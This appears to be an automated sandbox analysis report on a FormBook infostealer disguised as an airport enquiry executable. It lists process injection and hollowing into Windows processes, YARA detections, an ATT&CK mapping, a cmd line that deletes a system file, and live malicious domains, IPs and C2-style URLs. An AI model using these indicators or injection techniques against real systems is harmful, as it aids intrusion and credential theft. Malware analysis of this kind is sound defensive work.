          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]1_2_030649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]1_2_030FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]1_2_030BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]1_2_030BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]1_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]1_2_0306A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]1_2_03042840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]1_2_03060854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]1_2_03034859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]1_2_03034859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE872 mov eax, dword ptr fs:[00000030h]1_2_030BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE872 mov eax, dword ptr fs:[00000030h]1_2_030BE872
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CD81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CD81F7
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CAA395
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CAA364 SetUnhandledExceptionFilter,0_2_00CAA364
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_00979C10 SetUnhandledExceptionFilter,3_2_00979C10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_009795F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_009795F0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.214 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.18.23.89 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.235.46.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.18.24.121 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 970000Jump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CD8C93 LogonUserW,0_2_00CD8C93
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C83B4C
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C84A35
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE4EC9 mouse_event,0_2_00CE4EC9
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CD81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CD81F7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00CE4C03
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, explorer.exe, 00000002.00000002.4135304707.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133017076.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1689640801.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4131348268.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.1689421326.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1689640801.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4131348268.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1689640801.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4131348268.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA886B cpuid 0_2_00CA886B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,3_2_00975C84
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CB50D7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CC2230 GetUserNameW,0_2_00CC2230
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00CB418A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C84AFE

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: WIN_81
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: WIN_XP
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: WIN_XPe
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: WIN_VISTA
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: WIN_7
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: WIN_8
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00CF6596
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00CF6A5A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Service Execution          		3
          Windows Service          		2
          Valid Accounts          		2
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares21
          Input Capture          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS225
          System Information Discovery          		Distributed Component Object Model3
          Clipboard Data          		12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script3
          Windows Service          		1
          Rootkit          		LSA Secrets251
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
          Process Injection          		2
          Valid Accounts          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499643 Sample: New Al Maktoum Internationa... Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 34 www.iiixc759q.xyz 2->34 36 www.wvufcw948o.top 2->36 38 13 other IPs or domains 2->38 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 50 11 other signatures 2->50 11 New Al Maktoum International Airport Enquiry Ref #2401249.exe 4 2->11         started        signatures3 48 Performs DNS queries to domains with low reputation 34->48 process4 signatures5 58 Binary is likely a compiled AutoIt script file 11->58 60 Maps a DLL or memory area into another process 11->60 14 svchost.exe 11->14         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 3 other signatures 14->68 17 explorer.exe 69 1 14->17 injected process8 dnsIp9 28 www.serverdayz.com 103.224.212.214, 49740, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->28 30 sites.ludicrous.cloud 104.18.23.89, 49741, 80 CLOUDFLARENETUS United States 17->30 32 3 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 msiexec.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Switches to a custom stack to bypass stack traces 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          New Al Maktoum International Airport Enquiry Ref #2401249.exe32%ReversingLabsWin32.Trojan.AutoitInject
          New Al Maktoum International Airport Enquiry Ref #2401249.exe29%VirustotalBrowse
          New Al Maktoum International Airport Enquiry Ref #2401249.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.arlatwestern.shop1%VirustotalBrowse
          sites.ludicrous.cloud0%VirustotalBrowse
          www.wshifen.com0%VirustotalBrowse
          www.serverdayz.com1%VirustotalBrowse
          wheresthechocolateat.com1%VirustotalBrowse
          www.theselflovesite.com1%VirustotalBrowse
          www.iiixc759q.xyz4%VirustotalBrowse
          www.af28.top1%VirustotalBrowse
          www.wheresthechocolateat.com1%VirustotalBrowse
          www.betbox2341.com1%VirustotalBrowse
          www.wvufcw948o.top1%VirustotalBrowse
          www.sliveringaf.christmas3%VirustotalBrowse
          www.strategiclogisticsagency.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://aka.ms/odirmr0%URL Reputationsafe
          https://aka.ms/odirmr0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
          https://wns.windows.com/L0%URL Reputationsafe
          https://word.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
          https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://api.msn.com/q0%URL Reputationsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
          https://aka.ms/Vh5j3k0%URL Reputationsafe
          https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%Avira URL Cloudsafe
          http://www.af28.topReferer:0%Avira URL Cloudsafe
          http://www.dreziuy.xyz100%Avira URL Cloudmalware
          http://www.arlatwestern.shopReferer:0%Avira URL Cloudsafe
          http://www.uddyen.shop0%Avira URL Cloudsafe
          http://www.per-watch.com0%Avira URL Cloudsafe
          http://www.wheresthechocolateat.comReferer:0%Avira URL Cloudsafe
          http://www.uddyen.shop/pt46/0%Avira URL Cloudsafe
          http://www.betbox2341.comReferer:0%Avira URL Cloudsafe
          http://www.dreziuy.xyz0%VirustotalBrowse
          http://www.harbalmaizik.com0%Avira URL Cloudsafe
          http://www.sliveringaf.christmas/pt46/0%Avira URL Cloudsafe
          http://www.twinportslocal.com/pt46/0%Avira URL Cloudsafe
          http://www.uddyen.shop/pt46/2%VirustotalBrowse
          http://www.iiixc759q.xyz/pt46/100%Avira URL Cloudmalware
          http://www.per-watch.com0%VirustotalBrowse
          http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
          http://www.serverdayz.com0%Avira URL Cloudsafe
          http://www.uddyen.shop1%VirustotalBrowse
          http://www.iiixc759q.xyz/pt46/www.sliveringaf.christmas100%Avira URL Cloudmalware
          http://www.iiixc759q.xyz/pt46/0%VirustotalBrowse
          http://www.sliveringaf.christmas/pt46/5%VirustotalBrowse
          http://www.theselflovesite.com/pt46/www.iiixc759q.xyz0%Avira URL Cloudsafe
          http://www.serverdayz.com1%VirustotalBrowse
          http://www.theselflovesite.com/pt46/0%Avira URL Cloudsafe
          http://www.wvufcw948o.top0%Avira URL Cloudsafe
          http://www.twinportslocal.com/pt46/0%VirustotalBrowse
          http://www.serverdayz.com/pt46/0%Avira URL Cloudsafe
          http://www.wheresthechocolateat.com/pt46/www.serverdayz.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%Avira URL Cloudsafe
          http://www.wvufcw948o.top1%VirustotalBrowse
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%Avira URL Cloudsafe
          http://www.theselflovesite.com/pt46/5%VirustotalBrowse
          http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
          http://www.serverdayz.com/pt46/1%VirustotalBrowse
          www.wheresthechocolateat.com/pt46/0%Avira URL Cloudsafe
          http://www.uddyen.shop/pt46/www.harbalmaizik.com0%Avira URL Cloudsafe
          http://www.strategiclogisticsagency.com/pt46/www.arlatwestern.shop0%Avira URL Cloudsafe
          http://www.harbalmaizik.com0%VirustotalBrowse
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%Avira URL Cloudsafe
          http://www.serverdayz.comReferer:0%Avira URL Cloudsafe
          www.wheresthechocolateat.com/pt46/1%VirustotalBrowse
          http://www.strategiclogisticsagency.comReferer:0%Avira URL Cloudsafe
          http://www.betbox2341.com/pt46/www.dreziuy.xyz0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%Avira URL Cloudsafe
          http://www.sliveringaf.christmas/pt46/www.twinportslocal.com0%Avira URL Cloudsafe
          http://www.cb214.pro/pt46/0%Avira URL Cloudsafe
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
          http://www.sliveringaf.christmas0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%Avira URL Cloudsafe
          http://www.betbox2341.com/pt46/www.dreziuy.xyz2%VirustotalBrowse
          http://www.harbalmaizik.comReferer:0%Avira URL Cloudsafe
          http://www.iiixc759q.xyz0%Avira URL Cloudsafe
          http://www.sliveringaf.christmas3%VirustotalBrowse
          http://www.wvufcw948o.top/pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz0%Avira URL Cloudsafe
          http://www.cb214.pro/pt46/2%VirustotalBrowse
          http://www.betbox2341.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-0%Avira URL Cloudsafe
          http://www.twinportslocal.com0%Avira URL Cloudsafe
          http://www.betbox2341.com/pt46/0%Avira URL Cloudsafe
          http://www.arlatwestern.shop100%Avira URL Cloudphishing
          http://www.betbox2341.com1%VirustotalBrowse
          http://www.dreziuy.xyzReferer:0%Avira URL Cloudsafe
          http://www.twinportslocal.com/pt46/www.per-watch.com0%Avira URL Cloudsafe
          http://www.cb214.proReferer:0%Avira URL Cloudsafe
          http://www.per-watch.comReferer:0%Avira URL Cloudsafe
          http://www.af28.top/pt46/www.wvufcw948o.top0%Avira URL Cloudsafe
          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%Avira URL Cloudsafe
          http://www.theselflovesite.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.arlatwestern.shop
          		104.18.24.121
          		truetrueunknown
          sites.ludicrous.cloud
          		104.18.23.89
          		truetrueunknown
          www.wshifen.com
          		103.235.46.96
          		truetrueunknown
          www.serverdayz.com
          		103.224.212.214
          		truetrueunknown
